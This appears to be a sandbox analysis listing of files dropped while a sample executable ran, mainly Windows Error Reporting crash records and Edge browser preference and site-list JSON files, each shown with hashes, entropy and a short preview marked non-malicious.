                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.7.9.9.4.0.5.6.7.6.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.7.9.9.4.2.9.5.8.2.8.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.e.e.f.e.b.f.-.b.d.e.2.-.4.6.0.8.-.9.6.a.6.-.d.7.b.2.3.4.1.6.b.1.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.8.a.2.a.8.f.-.5.1.1.f.-.4.b.6.2.-.b.0.f.a.-.5.2.8.f.1.c.e.5.d.a.6.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.N.i.e.u.w.e.b.e.s.t.e.l.l.i.n.g.e.n.1.0.1.2.2.0.2.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.o.n.s.o.l.e.A.p.p.l.i.c.a.t.i.o.n.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.d.0.-.0.0.0.1.-.0.0.1.4.-.b.5.6.f.-.7.f.1.d.a.8.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.b.f.4.1.1.f.6.6.d.4.5.5.e.6.0.e.4.3.6.2.c.d.b.d.5.d.b.0.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.7.d.3.9.5.1.4.5.a.4.e.8.b.1.6.4.e.5.0.5.9.7.1.
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Wed Dec 11 08:39:01 2024, 0x1205a4 type
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):512373
                                                                                                                                                                            Entropy (8bit):3.3713341985650587
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:UgJeos2Ci2C1CCqTT2b3+vr9xbqSfilaOFzsGraW4+v0OcSq/:Dg2Ci2gqTTi3Qr92naW/F
                                                                                                                                                                            MD5:7DFFFFE20EF9D1B7FED1D63CBA10DF0E
                                                                                                                                                                            SHA1:0988F339BA8A26AF6F8A84DF1473AE1043CB2C67
                                                                                                                                                                            SHA-256:6EA6B60260C5ABD9D4F08848D18DA89D421A37ABE0A09C3E2A4158D9438157D4
                                                                                                                                                                            SHA-512:51D4CC2C691D798A7523786705B1AF46D81C260555A8BE019FF271CFC07D2D4FF8EAA0278EA4F84DD69FF379EAD03C2F2DB5B391D13BDC4214D674F813C36191
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MDMP..a..... ........OYg............t...........<...........$....(......88...(.......t.............l.......8...........T............=..u...........,a...........c..............................................................................eJ.......c......Lw......................T............OYg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8664
                                                                                                                                                                            Entropy (8bit):3.706930373382355
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:R6l7wVeJV8FxP6YEIygVWgmfX4Epr089bVHSfjoHm:R6lXJ+TP6YEdgVWgmfX4gVyfZ
                                                                                                                                                                            MD5:87293CED19B2CDFC5B8C3AE865AF1C44
                                                                                                                                                                            SHA1:31CD277E5530730F46C1B3918A3BCEB925DB06AF
                                                                                                                                                                            SHA-256:722CB4B3F2EBA3344E41CB8D6BC9CE72EA1AB1ED18404B87C1401C52D5CF95FE
                                                                                                                                                                            SHA-512:1AC4AF67687CEB70B2BA5E9B99D40C11276739A2977BAD796094CAAB9767D19500C6D6F2F5FBFC5D2B23AED70CCBD493B60E1E2E5D5F39EA13E454C9DADCB435
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.9.6.<./.P.i.
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4847
                                                                                                                                                                            Entropy (8bit):4.533199210137322
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:cvIwWl8zsyJg771I9gTWpW8VYQYm8M4J5+1N+F7yq85n122Ec0zY0hqd:uIjfAI7zi7VgJ5kuOJEc0zY0hqd
                                                                                                                                                                            MD5:F8DA1F88036C57BB09FCEB0F5867142B
                                                                                                                                                                            SHA1:F3F09D4C79A32BD402A4F790E162057ADE32E456
                                                                                                                                                                            SHA-256:2F0667E916FBBFDA767A656BF168312A2EDA90F459FC149DB230B31241546E9B
                                                                                                                                                                            SHA-512:E62C4AC3DBAB5E80FF6A9BA5DB9EBABCF3945651E2755B8F31D6AB719828D61E3C5A36F55B003C5A9CECAF7116BAD2C73E83E6577E3D9F4382FB26BCB978C1F3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="626381" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4286
                                                                                                                                                                            Entropy (8bit):3.8046022951415335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                                                                                                                            MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                                                                                                                            SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                                                                                                                            SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                                                                                                                            SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44798
                                                                                                                                                                            Entropy (8bit):6.096573107876333
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkSdFuUhDO6vP6OdodUYnMDVvsRncGoup1Xl3jVzXrT:z/Ps+wsI7yOVc69odUachu3VlXr4CRo4
                                                                                                                                                                            MD5:50D23778923F196C926C3443F7633BD1
                                                                                                                                                                            SHA1:DA5EA3E422644A011741F003F0DD19C1A5D65661
                                                                                                                                                                            SHA-256:C9FCDDFDBE2687B6083DCF7CE04B56539D4F300555ADF129AD8FE62F5A1B1FB3
                                                                                                                                                                            SHA-512:30E86869EE80820A48CF1B71D82596D57DC202B97984FEAC74BF4C4AA3D2E8779E5BA35F41FC8738350D11524A925FC75862568CED924EB88250698DB3352080
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44911
                                                                                                                                                                            Entropy (8bit):6.086420707325095
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dkSdFuUhDO6vP6Oe7t/zuhvsR3XDgh1+wbCAoTGoup1Xl3jVzXb:OMk1rT8H1Vc6it/zVkh8wbRoThu3VlXb
                                                                                                                                                                            MD5:322E3D8BA8AB03077C30B62B76B2978B
                                                                                                                                                                            SHA1:F466D211339CFCB18F5586A6AD0663EC4FF5BA64
                                                                                                                                                                            SHA-256:8D1D5B70A21665F011543AC3EF9D96B169C251570EF70B6917D90776BAB3053B
                                                                                                                                                                            SHA-512:A416A29357FF1EEF8810A4F00F359C4F4C319B027BB8D8E1AFA11FC94F695821DAA2D54E97B569E8A9ECFED6343BD99DFB4B750882BC9367B7860B99C9218811
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55vViEOsF96z3F4ONrN2yeYHGQlo5wvtB8h5moYSz3q4XkgOLF68CtN9
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):45126
                                                                                                                                                                            Entropy (8bit):6.092180142487937
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dkSdFuUhDO6vP6OdodUYnMDVvsRnvXDgh1+wbCAoTGoup1Xl3jx:OMk1rT8H1Vc69odUavkh8wbRoThu3Vlr
                                                                                                                                                                            MD5:5AA18FE55C12623C0311DCB0224B1D46
                                                                                                                                                                            SHA1:43527501F8BD91D0EAA8296696064C770AB3D725
                                                                                                                                                                            SHA-256:149C3A4D23C9FF23766E79C5D7E3F3E99F206F8936D1D2BD1183E7B0CE3DC4C8
                                                                                                                                                                            SHA-512:DB3C55D0B9223C5F308B37F10226574358EE150043BA261813416EF391EB272811243DDB7C578BC773DA85D434718E1FA95AFA4FC7C483600ADF268989D21547
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55vViEOsF96z3F4ONrN2yeYHGQlo5wvtB8h5moYSz3q4XkgOLF68CtN9
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                            Entropy (8bit):4.64013246649014
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                            MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                            SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                            SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                            SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                            Entropy (8bit):4.64013246649014
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                            MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                            SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                            SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                            SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                            MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                            SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                            SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                            SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                            MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                            SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                            SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                            SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                            Entropy (8bit):4.132041621771752
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD54llt:o1ApdeaEqYsMazlYBVsJDu2ziy54/
                                                                                                                                                                            MD5:BD72B24D3506282E86F2DE573239D060
                                                                                                                                                                            SHA1:6E1A396615B8BCE53E24C9C64BA63C194325EB59
                                                                                                                                                                            SHA-256:1018F6A3BA584F39BACB39A5F83372F0D50274DAE10B189C03F16E23EF02EF72
                                                                                                                                                                            SHA-512:1AD4F2DC7ABA21C13202B5E2CFCDF88D6AE5AB139CD1A8956370E9D61D2129F49CD6C905CDBA82AC8075815B1656487BC4F41A3985BB0053FD85302B16826F0E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8450
                                                                                                                                                                            Entropy (8bit):5.215235704830702
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihzWvXpkAsY8bV+FiA66W7LlaFIMYWPLMJ:stFSBso0xhzWvibGix6W7LlaTYB
                                                                                                                                                                            MD5:5AACB50FC8D57895825A66B72031E591
                                                                                                                                                                            SHA1:3EB978B18360CAC32451918845E97515D2D0C8F0
                                                                                                                                                                            SHA-256:858AB6BB03B04AB87BBFC8A94EE201B01B6F17AAE52101ADAF9DB619854FA7DB
                                                                                                                                                                            SHA-512:46210AA167E9858B448CE02F9DA28E67F5D36730B779F795ED77982B9EE1EDCCB48CBD305A55F636E67883BEB38503FE0C2B42274E48CF0652395A358886A227
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
